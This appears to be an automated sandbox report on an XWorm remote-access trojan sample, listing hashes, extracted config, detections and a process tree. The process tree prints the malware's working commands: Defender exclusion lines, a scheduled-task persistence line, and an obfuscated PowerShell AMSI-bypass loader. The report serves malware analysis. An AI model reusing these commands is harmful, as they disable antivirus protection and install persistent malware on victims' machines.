Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20231023-en -
resource tags
arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system -
submitted
11/11/2023, 15:27
Static task
static1
Behavioral task
behavioral1
Sample
Xpub updated.exe
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
Xpub updated.exe
Resource
win10v2004-20231023-en
General
-
Target
Xpub updated.exe
-
Size
1.0MB
-
MD5
25c2bf24f3b8f423a4181c7f67ae50b5
-
SHA1
2190d3faa60c34fc4b9a237bba9abac14fc28021
-
SHA256
713970f3fdf9d2d5a7819c8a84731f331277c7c75f1b88b60c22fabc9f2e2159
-
SHA512
2f5d0e84db21fe25d3c3e5c647f12b8b292411682514d19d55ccfa0491b8d279872a1866e2af685b870a752be84cf2f1b56f40c37afb3e2cf1135fbbc4fe9cf7
-
SSDEEP
24576:nyhVzcJg9bxWnM8/uGu7Gzw/Fe552DydluAqYOn+YRD331:yHxl8/q7JFxglVqLnBD331
Malware Config
Extracted
xworm
5.0
6dscd9NcNiKn8WNo
-
Install_directory
%AppData%
-
install_file
$k.exe
-
pastebin_url
https://pastebin.com/raw/s2R3Fsug
Signatures
-
Detect Xworm Payload 6 IoCs
resource yara_rule behavioral2/files/0x0006000000022cd7-38.dat family_xworm behavioral2/files/0x0006000000022cd7-37.dat family_xworm behavioral2/files/0x0006000000022cd7-32.dat family_xworm behavioral2/memory/4492-42-0x0000000000960000-0x0000000000972000-memory.dmp family_xworm behavioral2/files/0x000b000000022cd4-135.dat family_xworm behavioral2/files/0x000b000000022cd4-136.dat family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1620 created 624 1620 powershell.EXE 2 -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation $k.exe Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation Xpub updated.exe Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation XBinderOutput.exe -
Executes dropped EXE 5 IoCs
pid Process 3676 AE-FREE.exe 3176 XBinderOutput.exe 4492 $k.exe 212 $k install.exe 2168 $k.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$k = "C:\\Users\\Admin\\AppData\\Roaming\\$k.exe" $k.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 30 ip-api.com -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1620 set thread context of 1144 1620 powershell.EXE 125 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5060 schtasks.exe -
Modifies data under HKEY_USERS 41 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4492 $k.exe -
Suspicious behavior: EnumeratesProcesses 21 IoCs
pid Process 2536 powershell.exe 2536 powershell.exe 2536 powershell.exe 1620 powershell.EXE 1620 powershell.EXE 1004 powershell.exe 1004 powershell.exe 1004 powershell.exe 1620 powershell.EXE 4812 powershell.exe 4812 powershell.exe 4812 powershell.exe 4144 powershell.exe 4144 powershell.exe 4144 powershell.exe 4492 $k.exe 1620 powershell.EXE 1144 dllhost.exe 1144 dllhost.exe 1144 dllhost.exe 1144 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 4492 $k.exe Token: SeDebugPrivilege 2536 powershell.exe Token: SeDebugPrivilege 1620 powershell.EXE Token: SeDebugPrivilege 1004 powershell.exe Token: SeDebugPrivilege 4812 powershell.exe Token: SeDebugPrivilege 4144 powershell.exe Token: SeDebugPrivilege 4492 $k.exe Token: SeDebugPrivilege 2168 $k.exe Token: SeDebugPrivilege 1620 powershell.EXE Token: SeDebugPrivilege 1144 dllhost.exe Token: SeShutdownPrivilege 1020 dwm.exe Token: SeCreatePagefilePrivilege 1020 dwm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4492 $k.exe -
Suspicious use of WriteProcessMemory 42 IoCs
description pid Process procid_target PID 3548 wrote to memory of 3676 3548 Xpub updated.exe 92 PID 3548 wrote to memory of 3676 3548 Xpub updated.exe 92 PID 3548 wrote to memory of 3176 3548 Xpub updated.exe 96 PID 3548 wrote to memory of 3176 3548 Xpub updated.exe 96 PID 3676 wrote to memory of 4344 3676 AE-FREE.exe 94 PID 3676 wrote to memory of 4344 3676 AE-FREE.exe 94 PID 3676 wrote to memory of 4348 3676 AE-FREE.exe 95 PID 3676 wrote to memory of 4348 3676 AE-FREE.exe 95 PID 3176 wrote to memory of 4492 3176 XBinderOutput.exe 99 PID 3176 wrote to memory of 4492 3176 XBinderOutput.exe 99 PID 3176 wrote to memory of 212 3176 XBinderOutput.exe 100 PID 3176 wrote to memory of 212 3176 XBinderOutput.exe 100 PID 3176 wrote to memory of 212 3176 XBinderOutput.exe 100 PID 4492 wrote to memory of 2536 4492 $k.exe 102 PID 4492 wrote to memory of 2536 4492 $k.exe 102 PID 4492 wrote to memory of 1004 4492 $k.exe 106 PID 4492 wrote to memory of 1004 4492 $k.exe 106 PID 4492 wrote to memory of 4812 4492 $k.exe 108 PID 4492 wrote to memory of 4812 4492 $k.exe 108 PID 4492 wrote to memory of 4144 4492 $k.exe 110 PID 4492 wrote to memory of 4144 4492 $k.exe 110 PID 4492 wrote to memory of 5060 4492 $k.exe 112 PID 4492 wrote to memory of 5060 4492 $k.exe 112 PID 1620 wrote to memory of 1144 1620 powershell.EXE 125 PID 1620 wrote to memory of 1144 1620 powershell.EXE 125 PID 1620 wrote to memory of 1144 1620 powershell.EXE 125 PID 1620 wrote to memory of 1144 1620 powershell.EXE 125 PID 1620 wrote to memory of 1144 1620 powershell.EXE 125 PID 1620 wrote to memory of 1144 1620 powershell.EXE 125 PID 1620 wrote to memory of 1144 1620 powershell.EXE 125 PID 1620 wrote to memory of 1144 1620 powershell.EXE 125 PID 1144 wrote to memory of 624 1144 dllhost.exe 2 PID 1144 wrote to memory of 684 1144 dllhost.exe 7 PID 1144 wrote to memory of 956 1144 dllhost.exe 19 PID 1144 wrote to memory of 1020 1144 dllhost.exe 18 PID 1144 wrote to memory of 540 1144 dllhost.exe 9 PID 684 wrote to memory of 2448 684 lsass.exe 45 PID 1144 wrote to memory of 920 1144 dllhost.exe 11 PID 4492 wrote to memory of 1996 4492 $k.exe 127 PID 4492 wrote to memory of 1996 4492 $k.exe 127 PID 4492 wrote to memory of 1996 4492 $k.exe 127 PID 684 wrote to memory of 2448 684 lsass.exe 45 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:624
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1020
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ca00967b-68e1-40bf-a68b-80a9068ee6b7}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1144
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:540
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:920
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:956
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2448
-
C:\Users\Admin\AppData\Local\Temp\Xpub updated.exe"C:\Users\Admin\AppData\Local\Temp\Xpub updated.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Users\Admin\AppData\Local\Temp\AE-FREE.exe"C:\Users\Admin\AppData\Local\Temp\AE-FREE.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c color 0a3⤵PID:4344
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:4348
-
-
-
C:\Users\Admin\AppData\Local\Temp\XBinderOutput.exe"C:\Users\Admin\AppData\Local\Temp\XBinderOutput.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Users\Admin\AppData\Local\Temp\$k.exe"C:\Users\Admin\AppData\Local\Temp\$k.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\$k.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2536
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$k.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$k.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$k.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4144
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$k" /tr "C:\Users\Admin\AppData\Roaming\$k.exe"4⤵
- Creates scheduled task(s)
PID:5060
-
-
C:\Users\Admin\AppData\Local\Temp\hdtuiv.exe"C:\Users\Admin\AppData\Local\Temp\hdtuiv.exe"4⤵PID:1996
-
-
-
C:\Users\Admin\AppData\Local\Temp\$k install.exe"C:\Users\Admin\AppData\Local\Temp\$k install.exe"3⤵
- Executes dropped EXE
PID:212
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fcJULfnbBIfu{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lyHviagHWKgfHS,[Parameter(Position=1)][Type]$tsNWZQyXwO)$TdmOOkCNGsU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+'o'+''+[Char](100)+''+'u'+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+'l'+[Char](101)+''+[Char](103)+'a'+'t'+'e'+'T'+'yp'+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+','+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s,A'+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$TdmOOkCNGsU.DefineConstructor(''+[Char](82)+'TS'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+'al'+[Char](78)+''+'a'+'m'+'e'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lyHviagHWKgfHS).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+'g'+''+'e'+''+'d'+'');$TdmOOkCNGsU.DefineMethod(''+[Char](73)+'n'+'v'+''+'o'+''+'k'+'e',''+'P'+''+[Char](117)+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+'H'+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+''+'S'+'i'+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+'t'+','+'V'+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l',$tsNWZQyXwO,$lyHviagHWKgfHS).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+'M'+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+'d');Write-Output $TdmOOkCNGsU.CreateType();}$kOXTRPrTffZnV=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+'e'+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType('Mi'+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+'t'+''+[Char](46)+'Wi'+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+'U'+'n'+''+'s'+'a'+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$vpHjmSbHedSQqA=$kOXTRPrTffZnV.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hOCSaBQtRuAjlCqjhKE=fcJULfnbBIfu @([String])([IntPtr]);$PVGvnOXtTVQZHTtLTQlmLU=fcJULfnbBIfu @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$VcQcJgTJITT=$kOXTRPrTffZnV.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+[Char](72)+'a'+'n'+'dl'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')));$kNbCDlLLKXGykt=$vpHjmSbHedSQqA.Invoke($Null,@([Object]$VcQcJgTJITT,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$UxjHRSMpohharnfXS=$vpHjmSbHedSQqA.Invoke($Null,@([Object]$VcQcJgTJITT,[Object]('V'+'i'+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+'r'+'o'+'t'+'e'+''+[Char](99)+'t')));$KGWQeUm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kNbCDlLLKXGykt,$hOCSaBQtRuAjlCqjhKE).Invoke(''+[Char](97)+''+[Char](109)+'s'+'i'+''+[Char](46)+''+'d'+'l'+[Char](108)+'');$MYMrNfQupZuJxGkfB=$vpHjmSbHedSQqA.Invoke($Null,@([Object]$KGWQeUm,[Object]('A'+[Char](109)+'s'+[Char](105)+''+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$fVVZPnWpsB=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UxjHRSMpohharnfXS,$PVGvnOXtTVQZHTtLTQlmLU).Invoke($MYMrNfQupZuJxGkfB,[uint32]8,4,[ref]$fVVZPnWpsB);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$MYMrNfQupZuJxGkfB,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UxjHRSMpohharnfXS,$PVGvnOXtTVQZHTtLTQlmLU).Invoke($MYMrNfQupZuJxGkfB,[uint32]8,0x20,[ref]$fVVZPnWpsB);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+'F'+''+[Char](84)+'W'+'A'+''+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](107)+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1620
-
C:\Users\Admin\AppData\Roaming\$k.exeC:\Users\Admin\AppData\Roaming\$k.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2168
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5e6d75ea0804f3349c98ab2a3697afbdf
SHA1af630f0b13094907bed49473af6dedbf4aaf473e
SHA25638bb07c6d1442786f683bd682224732f13226a1d3d81b37f32c49b1a943ce05b
SHA512ec7256543d0aeb7f5430bef2352b3873c6c34a6069cb4d349385f14516143db12083b3b7af68c21023635f5a4dc6d5b2689a3c54df9c3cd9dadea47f3ce8f757
-
Filesize
944B
MD596e3b86880fedd5afc001d108732a3e5
SHA18fc17b39d744a9590a6d5897012da5e6757439a3
SHA256c3077e4cadb4ed246c02abe55aa6cf832fee4c2546b7addb7d22cd1c7c8c1294
SHA512909b1968f7204fa7029109b02232d8cc5438f6b4dc7c9044e4e47c59fcee538199b13029e36592b12ed573d48a308dd4822d2ced4129ab08d4111897e02be55d
-
Filesize
944B
MD53a6bad9528f8e23fb5c77fbd81fa28e8
SHA1f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2
-
Filesize
161KB
MD55e1781e69a041fc989cbb7abe704363b
SHA12ca02551ed6fefddd421f1303e81c4b8f0814130
SHA2569e2f99749214d5f728d96ede1e0e6713895f6c01829f66573e06502917c4b42d
SHA512aaf73335ddfb15614d6031f6724b8611b843aad9fbb111d517fc135954d7b7f065e4f6ac3d42bc12236459388befb5eded6a53a80b5efd6279e013b17b6b9b22
-
Filesize
161KB
MD55e1781e69a041fc989cbb7abe704363b
SHA12ca02551ed6fefddd421f1303e81c4b8f0814130
SHA2569e2f99749214d5f728d96ede1e0e6713895f6c01829f66573e06502917c4b42d
SHA512aaf73335ddfb15614d6031f6724b8611b843aad9fbb111d517fc135954d7b7f065e4f6ac3d42bc12236459388befb5eded6a53a80b5efd6279e013b17b6b9b22
-
Filesize
161KB
MD55e1781e69a041fc989cbb7abe704363b
SHA12ca02551ed6fefddd421f1303e81c4b8f0814130
SHA2569e2f99749214d5f728d96ede1e0e6713895f6c01829f66573e06502917c4b42d
SHA512aaf73335ddfb15614d6031f6724b8611b843aad9fbb111d517fc135954d7b7f065e4f6ac3d42bc12236459388befb5eded6a53a80b5efd6279e013b17b6b9b22
-
Filesize
48KB
MD51e8a020876016dfb400e1f94db3dd866
SHA1fbeb8ac7335c139b5d08f929e979d0aa317981e2
SHA256463e516bfaec76fb7bdb524772acbbcc64aa8d04bba7eea319fa0751f645bcf2
SHA512298e253211e9ab739f2aaafc41ba09f2f234587abe677e7d239e0897865cb5684d28a007545809a0e2c2fa6840efb367fda86b4b1243e3124f74897e6e953ce0
-
Filesize
48KB
MD51e8a020876016dfb400e1f94db3dd866
SHA1fbeb8ac7335c139b5d08f929e979d0aa317981e2
SHA256463e516bfaec76fb7bdb524772acbbcc64aa8d04bba7eea319fa0751f645bcf2
SHA512298e253211e9ab739f2aaafc41ba09f2f234587abe677e7d239e0897865cb5684d28a007545809a0e2c2fa6840efb367fda86b4b1243e3124f74897e6e953ce0
-
Filesize
48KB
MD51e8a020876016dfb400e1f94db3dd866
SHA1fbeb8ac7335c139b5d08f929e979d0aa317981e2
SHA256463e516bfaec76fb7bdb524772acbbcc64aa8d04bba7eea319fa0751f645bcf2
SHA512298e253211e9ab739f2aaafc41ba09f2f234587abe677e7d239e0897865cb5684d28a007545809a0e2c2fa6840efb367fda86b4b1243e3124f74897e6e953ce0
-
Filesize
1.1MB
MD517daa2459db2c35a6bce85f9c50ce6e1
SHA173812f97c50d8ec2540274b8524d0a1406937c04
SHA2567d91aec3960bd6d583ce554928a18fa1309f98c32239f301d354703bc9987ee2
SHA512cbec14acc3d5ef57f29555d7c546e2ecf038bd1155e9eb5868d74db4036383fcc8b5445d3bcfd1726970ba4f0e5bc48625c9e633402b493fbd3000c74f72199b
-
Filesize
1.1MB
MD517daa2459db2c35a6bce85f9c50ce6e1
SHA173812f97c50d8ec2540274b8524d0a1406937c04
SHA2567d91aec3960bd6d583ce554928a18fa1309f98c32239f301d354703bc9987ee2
SHA512cbec14acc3d5ef57f29555d7c546e2ecf038bd1155e9eb5868d74db4036383fcc8b5445d3bcfd1726970ba4f0e5bc48625c9e633402b493fbd3000c74f72199b
-
Filesize
1.1MB
MD517daa2459db2c35a6bce85f9c50ce6e1
SHA173812f97c50d8ec2540274b8524d0a1406937c04
SHA2567d91aec3960bd6d583ce554928a18fa1309f98c32239f301d354703bc9987ee2
SHA512cbec14acc3d5ef57f29555d7c546e2ecf038bd1155e9eb5868d74db4036383fcc8b5445d3bcfd1726970ba4f0e5bc48625c9e633402b493fbd3000c74f72199b
-
Filesize
181KB
MD5fe6bd020ec20bb2df56a84d14805627e
SHA19e091bc5b6e93c63a99329e4a1295a397f647abc
